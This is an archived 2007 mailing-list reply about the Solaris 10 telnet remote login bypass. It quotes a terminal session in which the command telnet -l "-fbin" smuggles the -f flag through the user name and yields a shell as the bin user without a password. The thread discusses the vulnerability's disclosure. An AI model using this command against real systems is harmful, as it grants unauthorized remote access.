Solaris 10 Telnet Exploit

• Previous message (by thread): Solaris 10 Telnet Exploit
• Next message (by thread): Solaris 10 Telnet Exploit
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sun, 11 Feb 2007, William Schultz wrote:
> 
> http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- 
> disable.html
> 
> Tested on Sol10, and it indeed works... Good thing we use SSH, right?!

It works.
Credit to Johannes Ullrich at the SANS ISC.

I believe the vulnerability is that it is running telnet bu default.


> 
> ################################
> iWil:~ wschultz$ telnet -l "-fbin" dns1
> Trying A.B.C.D...
> Connected to dns1.my.com.
> Escape character is '^]'.
> Last login: Sun Feb 11 18:11:05 from A.B.C.D
> Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
> $ id
> uid=2(bin) gid=2(bin)
> $
> ################################
> 

• Previous message (by thread): Solaris 10 Telnet Exploit
• Next message (by thread): Solaris 10 Telnet Exploit
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]